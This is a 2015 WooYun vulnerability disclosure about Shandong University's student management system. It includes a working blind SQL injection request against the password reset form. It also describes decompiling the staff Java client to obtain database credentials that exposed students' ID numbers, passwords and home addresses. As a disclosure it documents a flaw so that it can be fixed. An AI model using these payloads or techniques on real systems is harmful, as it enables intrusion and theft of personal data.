当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148134

漏洞标题:山东大学某处注入以及配置缺陷可导致大量人员详细信息泄露

相关厂商:山东大学

漏洞作者: 眼镜蛇

提交时间:2015-10-20 18:50

修复时间:2015-12-08 08:44

公开时间:2015-12-08 08:44

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-20: 细节已通知厂商并且等待厂商处理中
2015-10-24: 厂商已经确认,细节仅向厂商公开
2015-11-03: 细节向核心白帽子及相关领域专家公开
2015-11-13: 细节向普通白帽子公开
2015-11-23: 细节向实习白帽子公开
2015-12-08: 细节向公众公开

简要描述:

禁止不安全的配置,一定要有安全意识

详细说明:

一、一处注入漏洞:
http://www.bksms.sdu.edu.cn/login
这里本科生综合管理信息系统
点重置密码

1.png


这里证件号码随便填 ,用户名' or '1'='1 和' or '1'='2返回结果不一致
判断存在注入
用burp抓包检测确定存在注入

POST /bsuims/bsUserPasswordResetInit.do?sectionName=passwordReset&itemName=passwordResetSubmit HTTP/1.1
Host: www.bksms.sdu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.bksms.sdu.edu.cn/bsuims/bsMainFrameInit.do?sectionName=login&itemName=getPasswordActionNew&controlType=frame
Cookie: JSESSIONID=FB363A8458AE70775E57684FE3C0A6F3; username=; password=; autocheck=false
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------29567262186535
Content-Length: 993
-----------------------------29567262186535
Content-Disposition: form-data; name="contextPath"
-----------------------------29567262186535
Content-Disposition: form-data; name="contextName"
bsUserResetPassswordPage
-----------------------------29567262186535
Content-Disposition: form-data; name="contextPara"
-----------------------------29567262186535
Content-Disposition: form-data; name="sectionName"
login
-----------------------------29567262186535
Content-Disposition: form-data; name="itemName"
loginAction
-----------------------------29567262186535
Content-Disposition: form-data; name="controlType"
frame
-----------------------------29567262186535
Content-Disposition: form-data; name="passwordReset_userName"
' and  1=(case when ascii(mid(user(),2,1))=98 then 1 else 2 end) and '1'='1
-----------------------------29567262186535
Content-Disposition: form-data; name="passwordReset_idCard"
e
-----------------------------29567262186535--


发包猜解 返回正确信息时返回数据包长度有所不同,如图:

1.jpg


最终注入得到当前用户 : bksms@202.194.14.48,当前数据库:bksms
二、客户端配置漏洞:
http://www.bksms.sdu.edu.cn/login
还是这个登录处,右边图片上面一行文字,如果不仔细可能不会注意到它。
偏偏就是这行文字带来了一个严重的漏洞。

1.png


管理员、教务员点此登录
点进去发现并无登录界面,仔细看了下,需要安装一个客户端,首先想到了逆向客户端,看下是否会有有用信息。
下载后发现这个客户端是JAVA编写的软,那么反编译成源代码就轻而易举了。
下载后发现是个这样一个文件ws.jnlp 以文本方式打开:

<?xml version="1.0" encoding="UTF-8"?>
<jnlp  spec="1.6+"  codebase="http://202.194.14.48/client/"  href="ws.jnlp">
  <information>
    <title>山东大学本科生综合教务管理系统</title>
    <vendor>山东大学软件学院</vendor>
    <icon kind="shortcut" href="applications.png" width="128" height="128"/>
  </information>
  <shortcut online="true">
    <desktop />
    <menu />
  </shortcut>
  <security>
      <all-permissions/>
  </security>
  <resources>
    <j2se version="1.6+"  java-vm-args="-Xms128m -Xmx512m"/>
    <jar href="bksms.jar"/>
  </resources>
  <application-desc main-class="cn.edu.sdu.bksms.BksmsClientMain"/>
</jnlp>


判断真正软件地址是http://202.194.14.48/client/bksms.jar,访问果然下载下来了。
然后我们反编译它
看到了数据库配置信息:

1.png


本地连接数据库,出现了个吉利的数字有888个表,信息量十分大:

1.jpg


这个应该是整个学校最核心的数据库系统了

漏洞证明:

可导致大量人员敏感信息泄露
学生学分和交费信息

1.png


网站发布的通告可导致被任意修改

2.png


以及姓名、身份证、系统登录密码、邮箱、QQ、手机号码、家庭详细住址等等

1.png


修复方案:

1、对于注入:过滤参数
2、对于客户端漏洞 建议对代码混淆增强保护措施
密码等信息不要明文保存

版权声明:转载请注明来源 眼镜蛇@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-10-24 08:42

厂商回复:

已通报系统所属单位处置

最新状态:

暂无